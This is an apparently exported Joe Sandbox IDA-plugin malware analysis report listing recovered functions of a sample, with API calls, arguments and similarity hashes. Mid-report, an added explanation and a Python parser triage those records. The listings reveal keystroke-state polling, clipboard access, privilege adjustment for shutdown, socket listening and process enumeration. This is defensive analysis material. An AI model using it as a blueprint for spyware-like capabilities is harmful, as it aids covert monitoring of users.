                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                            • Opcode ID: afcabf785149fdb8d41c7040963b5dffd45ca297a8777c155ebd986e420728cb
                                                                                                                                                                            • Instruction ID: 51dea43e203ab67a2573d85c0c9b97bcdddc7ec752fcc07decf3a44f09e6f30c
                                                                                                                                                                            • Opcode Fuzzy Hash: afcabf785149fdb8d41c7040963b5dffd45ca297a8777c155ebd986e420728cb
                                                                                                                                                                            • Instruction Fuzzy Hash: 8E418A285047C9EEFFB15BA48448BB7BEA06B11344F0840AFD9C6467D3D79C5DC8879A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: -es$ERCP$OaG$VUUU$VUUU$VUUU$VUUU
                                                                                                                                                                            • API String ID: 0-391117673
                                                                                                                                                                            • Opcode ID: b443a26c19b130c975624efc9ec2db7389eca9397a273c536ce64286a2ffa6f0
                                                                                                                                                                            • Instruction ID: bd72c93547b295b7be4825ef6031a6cabc6bd65e5411475f85d40867591c4008
                                                                                                                                                                            • Opcode Fuzzy Hash: b443a26c19b130c975624efc9ec2db7389eca9397a273c536ce64286a2ffa6f0
                                                                                                                                                                            • Instruction Fuzzy Hash: A2A28D74A0421ACBDF24CF58C9807FEB7B1BB95314F1481ABD959A7380D7389E81CB59
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                                                            • Opcode ID: 9a5d0783aa677ba88cc4d9e84703499636dac74c579756e788201abd43379151
                                                                                                                                                                            • Instruction ID: bb89797e4b4ee4101023081f71663cff207df8bf9cf7cd1a7dadfa93d701011b
                                                                                                                                                                            • Opcode Fuzzy Hash: 9a5d0783aa677ba88cc4d9e84703499636dac74c579756e788201abd43379151
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F21B135300210AFDB10AF61EC59B6A77A8EF44314F14806BF906DB362DB79AD02CB5D
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 004CF6AB
                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 004CF6DB
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF6EF
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF70A
                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?), ref: 004CF7A8
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF7BE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 713712311-438819550
                                                                                                                                                                            • Opcode ID: 94a9af8a46bc649f28a794dc004d7d204b1625df596c9861ee0568ac76343f7b
                                                                                                                                                                            • Instruction ID: 7cffb712e571f5a0f080f3b815709354a6e246ca444bc8dc462616966724d332
                                                                                                                                                                            • Opcode Fuzzy Hash: 94a9af8a46bc649f28a794dc004d7d204b1625df596c9861ee0568ac76343f7b
                                                                                                                                                                            • Instruction Fuzzy Hash: DF41AC7590120A9BCF51DF64CC85FEEBBB5BF05314F10456BE814A22A1EB389E48CB98
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4104443479-0
                                                                                                                                                                            • Opcode ID: 2b987ea8f82f80984ad9fefc92266aa7a6480ee7b5bd71f92632f1273e0b23f9
                                                                                                                                                                            • Instruction ID: c7b938b8fc7f5d2a5da3a468099f781012f037e5a0a8bf5facb479b7f8fd5702
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b987ea8f82f80984ad9fefc92266aa7a6480ee7b5bd71f92632f1273e0b23f9
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E12AC70A00609DFDF14DFA5D981AEEB7B5FF48304F10862AE406E7250EB39AD15CB69
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00480FF6: std::exception::exception.LIBCMT ref: 0048102C
                                                                                                                                                                              • Part of subcall function 00480FF6: __CxxThrowException@8.LIBCMT ref: 00481041
                                                                                                                                                                            • _memmove.LIBCMT ref: 004B062F
                                                                                                                                                                            • _memmove.LIBCMT ref: 004B0744
                                                                                                                                                                            • _memmove.LIBCMT ref: 004B07EB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                            • String ID: yZG
                                                                                                                                                                            • API String ID: 1300846289-210627360
                                                                                                                                                                            • Opcode ID: d793d975231d91f249698a0867c8a6fe0015cfbff17cda02bfdc21591fb654e0
                                                                                                                                                                            • Instruction ID: 5168ae46d0d8e82bf4d5182086818545a79b84a7f1dfaced1e4a29a6e9cd70cc
                                                                                                                                                                            • Opcode Fuzzy Hash: d793d975231d91f249698a0867c8a6fe0015cfbff17cda02bfdc21591fb654e0
                                                                                                                                                                            • Instruction Fuzzy Hash: AA02C070A00209DBCF04DF65D9816AEBBB5FF44304F14806EE80ADB255EB39DA55CBA9
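The records above are Joe Sandbox IDA-plugin function entries: for each recovered function, the resolved Win32/CRT calls with their constant arguments and call-site addresses, the memory dump the function was lifted from, and the similarity fields (API ID, String ID, Opcode ID, fuzzy hashes) used to match functions across samples. Read together they show, for example, modifier-key polling via GetAsyncKeyState/GetKeyState with 0xA0/0xA1 (VK_LSHIFT/VK_RSHIFT), 0x11 (VK_CONTROL), 0x12 (VK_MENU) and 0x5B (VK_LWIN), directory enumeration with FindFirstFileW("*.*")/FindNextFileW, and SeShutdownPrivilege-style AdjustTokenPrivileges before ExitWindowsEx. One caveat: these functions sit in the sample's own image (process 0, dump at 0x460000) and the report flags the sample as a compiled AutoIt script, so they most likely belong to the AutoIt runtime rather than to the injected FormBook payload; treat them as triage hints, not as FormBook indicators. The following parser is an added example for this page, not Joe Sandbox code; it assumes only the record layout visible in the report, and its VK table and capability tags are the example's own annotations rather than report fields. The embedded sample records are copied from this report and trimmed, with the last one deliberately cut off as on the page.

```python
"""Parse Joe Sandbox IDA-plugin function records (APIs / Memory Dump Source /
Similarity blocks) into structured data and triage them.  Added example for this
page, not Joe Sandbox code; VK names and capability tags are assumed annotations."""
import re

VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
            0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}
CAPABILITIES = {  # heuristic tags keyed on API call names (assumed labels)
    "keyboard-polling": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"},
    "clipboard": {"OpenClipboard", "EmptyClipboard", "SetClipboardData"},
    "file-enumeration": {"FindFirstFileW", "FindNextFileW"},
    "privilege-adjust": {"AdjustTokenPrivileges", "LookupPrivilegeValueW"},
    "shutdown": {"ExitWindowsEx"},
}
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
                    r"(?P<name>[^.\s(]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?"
                    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_records(text: str) -> list[dict]:
    """Split report text into records; a record ends at its Instruction Fuzzy Hash."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            cur = cur or {"apis": [], "strings": [], "dumps": [], "meta": {}}
        elif not line or cur is None:
            continue
        elif section == "APIs" and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur["apis"].append({"name": m["name"], "module": m["module"], "args": args,
                                "ref": m["ref"], "subcall": m["sub"]})
        elif section == "Strings":
            cur["strings"].append(line.lstrip("• "))
        elif m := KV_RE.match(line):
            key, value = m["key"].strip(), m["value"].strip()
            if section == "Memory Dump Source":
                # The HTML export glues the "Download File" link text onto dump names.
                cur["dumps"].append((key, value.removesuffix("Download File").strip()))
            else:
                cur["meta"][key] = value
                if key == "Instruction Fuzzy Hash":  # last field of a record
                    records.append(cur)
                    cur = None
    if cur and (cur["apis"] or cur["meta"]):  # report cut off mid-record: keep it
        records.append(cur)
    return records


def key_polls(rec: dict) -> list[str]:
    """Virtual keys checked via GetAsyncKeyState/GetKeyState ('?' = unrecovered argument)."""
    keys = set()
    for api in rec["apis"]:
        if api["name"] in ("GetAsyncKeyState", "GetKeyState") and api["args"]:
            try:
                vk = int(api["args"][0], 16)
            except ValueError:
                continue
            keys.add(VK_NAMES.get(vk, f"VK_{vk:#04x}"))
    return sorted(keys)


def capabilities(rec: dict) -> list[str]:
    called = {api["name"] for api in rec["apis"]}
    return sorted(tag for tag, apis in CAPABILITIES.items() if called & apis)


def triage(text: str) -> list[dict]:
    """One row per record: first call site, heuristic tags, polled keys, fuzzy hash."""
    return [{"ref": rec["apis"][0]["ref"] if rec["apis"] else None, "tags": capabilities(rec),
             "keys": key_polls(rec), "fuzzy": rec["meta"].get("Instruction Fuzzy Hash")}
            for rec in parse_records(text)]


# Records copied from this report and trimmed; the third is cut off as on the page.
SAMPLE = """
APIs
• GetAsyncKeyState.USER32(000000A0), ref: 004C02C2
• GetKeyState.USER32(000000A0), ref: 004C02DD
• GetAsyncKeyState.USER32(00000011), ref: 004C0324
• GetAsyncKeyState.USER32(0000005B), ref: 004C0378
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Instruction Fuzzy Hash: 8E418A285047C9EEFFB15BA48448BB7BEA06B11344F0840AFD9C6467D3D79C5DC8879A
APIs
  • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 004CF6AB
• FindNextFileW.KERNEL32(?,?), ref: 004CF7A8
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• Instruction Fuzzy Hash: DF41AC7590120A9BCF51DF64CC85FEEBBB5BF05314F10456BE814A22A1EB389E48CB98
APIs
  • Part of subcall function 004B8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B8D3A
  • Part of subcall function 004B8CC3: GetLastError.KERNEL32 ref: 004B8D47
• ExitWindowsEx.USER32(?,00000000), ref: 004C549B
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Feeding the whole exported report to `triage()` yields one row per function; the Instruction Fuzzy Hash and API String ID fields can then be compared against records from other FormBook or AutoIt samples to see which functions are shared runtime code and which are unique to this build.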
APIs
  • Part of subcall function 004B8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B8D0D
  • Part of subcall function 004B8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B8D3A
  • Part of subcall function 004B8CC3: GetLastError.KERNEL32 ref: 004B8D47
• ExitWindowsEx.USER32(?,00000000), ref: 004C549B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
Strings
Similarity
• API ID: __itow__swprintf
• String ID: OaG
• API String ID: 674341424-282697018
APIs
• socket.WSOCK32(00000002,00000001,00000006), ref: 004D65EF
• WSAGetLastError.WSOCK32(00000000), ref: 004D65FE
• bind.WSOCK32(00000000,?,00000010), ref: 004D661A
• listen.WSOCK32(00000000,00000005), ref: 004D6629
• WSAGetLastError.WSOCK32(00000000), ref: 004D6643
• closesocket.WSOCK32(00000000), ref: 004D6657
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
APIs
  • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 004619FA
• GetSysColor.USER32(0000000F), ref: 00461A4E
• SetBkColor.GDI32(?,00000000), ref: 00461A61
  • Part of subcall function 00461290: DefDlgProcW.USER32(?,00000020,?), ref: 004612D8
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
APIs
  • Part of subcall function 004D80A0: inet_addr.WSOCK32(00000000), ref: 004D80CB
• socket.WSOCK32(00000002,00000002,00000011), ref: 004D6AB1
• WSAGetLastError.WSOCK32(00000000), ref: 004D6ADA
• bind.WSOCK32(00000000,?,00000010), ref: 004D6B13
• WSAGetLastError.WSOCK32(00000000), ref: 004D6B20
• closesocket.WSOCK32(00000000), ref: 004D6B34
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
• CoInitialize.OLE32(00000000), ref: 004CC69D
• CoCreateInstance.OLE32(004F2D6C,00000000,00000001,004F2BDC,?), ref: 004CC6B5
  • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
• CoUninitialize.OLE32 ref: 004CC922
Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                            • API String ID: 2683427295-24824748
                                                                                                                                                                            • Opcode ID: 418ac9b19768abae70dbba81a0b7184081ec0ca0bbc0aba8ae9cb0baeb5f5328
                                                                                                                                                                            • Instruction ID: 8bfc98877d49b963ff5e560f1bcf2c2f90033c46a324d8231c303422cf8cac22
                                                                                                                                                                            • Opcode Fuzzy Hash: 418ac9b19768abae70dbba81a0b7184081ec0ca0bbc0aba8ae9cb0baeb5f5328
                                                                                                                                                                            • Instruction Fuzzy Hash: 64A14C71108305AFD300EF55C891EABB7ECEF94708F04491EF19697192EBB4AE49CB56
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,004A1D88,?), ref: 004DC312
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 004DC324
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
• Opcode ID: 24dd6b1cbfb313ddd60ef32739006d7cc8b5aeefa95d530e010263e6735e7c91
• Instruction ID: 7f8d00adb1136a74fcaf73f0e8eb7d528cd66f9ce405420e305f9caa33305f36
• Opcode Fuzzy Hash: 24dd6b1cbfb313ddd60ef32739006d7cc8b5aeefa95d530e010263e6735e7c91
• Instruction Fuzzy Hash: 30E08C70200703CFDB204B25D898A87BAD4EB08305B90C43BE885C6310E778D880CAA8
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 004DF151
• Process32FirstW.KERNEL32(00000000,?), ref: 004DF15F
  • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
• Process32NextW.KERNEL32(00000000,?), ref: 004DF21F
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 004DF22E
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
• Opcode ID: 1a60c7d782458b3b506c74f4bdea9406adc5d92d204113efb340a71d11065cf3
• Instruction ID: dc8a69fdf3c9dfbb50a6cb0d5cc08ebfebd8b6028c5d7b5e23b4da58d6dc7396
• Opcode Fuzzy Hash: 1a60c7d782458b3b506c74f4bdea9406adc5d92d204113efb340a71d11065cf3
• Instruction Fuzzy Hash: 9A518D715043009FD320EF21DC95E6BBBE8FF98714F14492EF49697292EB74A908CB96
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 004BEB19
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: 45acc27499f8a6b6ca866d3e905fce752f64e57d7230772dff9077ba27d4c961
• Instruction ID: 1530f976f4f5d8e1bad10be6c8b05ba40905a0e31b3b7872438a5e64cfe39695
• Opcode Fuzzy Hash: 45acc27499f8a6b6ca866d3e905fce752f64e57d7230772dff9077ba27d4c961
• Instruction Fuzzy Hash: D8324774A04605DFD728DF1AC481AAAB7F0FF88310B15C56EE99ACB3A1DB70E941CB54
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004D1AFE,00000000), ref: 004D26D5
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 004D270C
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: 1e6d414c0c157abbbf3fdbeb6e2f5d4a7adacb03a2928db9b28d486fc1536f0f
• Instruction ID: 2ca37aabe8ef0a63ef6e0552884ae946c31afb6111db344a620b3f9c8b3bcacd
• Opcode Fuzzy Hash: 1e6d414c0c157abbbf3fdbeb6e2f5d4a7adacb03a2928db9b28d486fc1536f0f
• Instruction Fuzzy Hash: 3E41E371500309BFEB209A95DE95EBFB7BCEB50718F10406FF601A6340EAF9DE419658
APIs
• SetErrorMode.KERNEL32(00000001), ref: 004CB5AE
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004CB608
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004CB655
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: bdee9a5238a9d933787777141807df89f80e68fcb747954a9234e152da87e716
• Instruction ID: 881d236e3c1657baff09a6681028b6c647f1e4b318d0d1fd1e135c88265220c8
• Opcode Fuzzy Hash: bdee9a5238a9d933787777141807df89f80e68fcb747954a9234e152da87e716
• Instruction Fuzzy Hash: 00217C35A00508EFCB00EFA5D880EADBBB8FF48314F0480AEE845AB351DB359906CB55
APIs
  • Part of subcall function 00480FF6: std::exception::exception.LIBCMT ref: 0048102C
  • Part of subcall function 00480FF6: __CxxThrowException@8.LIBCMT ref: 00481041
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B8D0D
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B8D3A
• GetLastError.KERNEL32 ref: 004B8D47
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
• Opcode ID: 3fbbf7622cc9b78fd689ba66d33b3f74ac98946ed14094843f8771e5672bd337
• Instruction ID: 2451548bcf6cadf21a6bb0e5f63bae474d7a401c97aa0094bf4abbcb28e0f5a5
• Opcode Fuzzy Hash: 3fbbf7622cc9b78fd689ba66d33b3f74ac98946ed14094843f8771e5672bd337
• Instruction Fuzzy Hash: 6211BFB1414208AFE728AF54DC85D6BB7BCEB44710B20852FF84697251EF74AC45CB28
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004C404B
• DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 004C4088
• CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004C4091
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: 71eda51fc9e4a872cb2ef5e5e797541f6d83f1876de959b5f53fd5c6c9de8f58
• Instruction ID: 1fff60f2a7a83e4ef602301f48024cdb35c370274ba74dff41c6245c0ff8f068
• Opcode Fuzzy Hash: 71eda51fc9e4a872cb2ef5e5e797541f6d83f1876de959b5f53fd5c6c9de8f58
